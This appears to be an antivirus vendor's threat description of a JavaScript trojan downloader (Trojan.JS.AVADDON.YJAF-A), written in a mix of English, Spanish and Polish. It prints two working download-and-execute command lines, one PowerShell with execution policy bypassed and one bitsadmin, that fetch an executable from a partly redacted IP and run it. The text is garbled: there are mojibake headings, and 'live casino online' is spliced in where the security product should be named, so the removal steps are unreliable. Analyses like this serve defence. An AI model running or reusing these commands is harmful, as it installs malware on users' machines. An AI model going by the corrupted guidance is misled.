Author: Bren Matthew Ebriega   
 

Trojan:Win32/AggBITSAbuse.A (MICROSOFT); PowerShell/TrojanDownloader.Agent.DV trojan (NOD32)

 PLATFORM:

Windows

 OVER ALL RISK RATING:
 DAMAGE POTENTIAL::
 DISTRIBUTION POTENTIAL::
 REPORTED INFECTION:
 INFORMATION EXPOSURE:
Low
Medium
High
Critical

  • Threat Type:
    Trojan

  • Destructiveness:
    No

  • Encrypted:
    No

  • In the wild::
    Yes

  OVERVIEW

INFECTION CHANNEL: Descargado de Internet

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Despu¨¦s ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.

  TECHNICAL DETAILS

File size: 408 bytes
File type: JS
Memory resident: No
INITIAL SAMPLES RECEIVED DATE: 10 czerwca 2020
PAYLOAD: Connects to URLs/IPs, Downloads files

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

±õ²Ô²õ³Ù²¹±ô²¹³¦¾±¨®²Ô

Agrega los procesos siguientes:

  • %System%\cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://{BLOCKED}.{BLOCKED}.117.63/{jpr.exe or sava.exe}','%User Temp%\{random numbers}.exe');Start-Process '%User Temp%\{random numbers}.exe'
  • %System%\cmd.exe /c bitsadmin /transfer getitman /download /priority high http:/{BLOCKED}.{BLOCKED}.117.63/{jpr.exe or sava.exe} %User Temp%\{random numbers}.exe&start %User Temp%\{random numbers}.exe

Rutina de descarga

Este malware descarga el archivo desde la siguiente URL y le cambia el nombre al almacenarlo en el sistema afectado:

  • http://{BLOCKED}.{BLOCKED}.117.63/jpr.exe
  • http://{BLOCKED}.{BLOCKED}.117.63/sava.exe

Guarda los archivos que descarga con los nombres siguientes:

Despu¨¦s ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.

  SOLUTION

Minimum scan engine: 9.850
First VSAPI Pattern File: 15.924.02
First VSAPI Pattern Release Date: 11 czerwca 2020
VSAPI OPR PATTERN-VERSION: 15.925.00
VSAPI OPR PATTERN DATE: 12 czerwca 2020

Step 1

Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploraci¨®n, deben comprobar que tienen desactivada la opci¨®n Restaurar sistema para permitir la exploraci¨®n completa del equipo.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Explorar el equipo con su producto de live casino online para eliminar los archivos detectados como Trojan.JS.AVADDON.YJAF-A En caso de que el producto de live casino online ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no ser¨¢n necesarios m¨¢s pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta para obtener m¨¢s informaci¨®n.


Did this description help? Tell us how we did.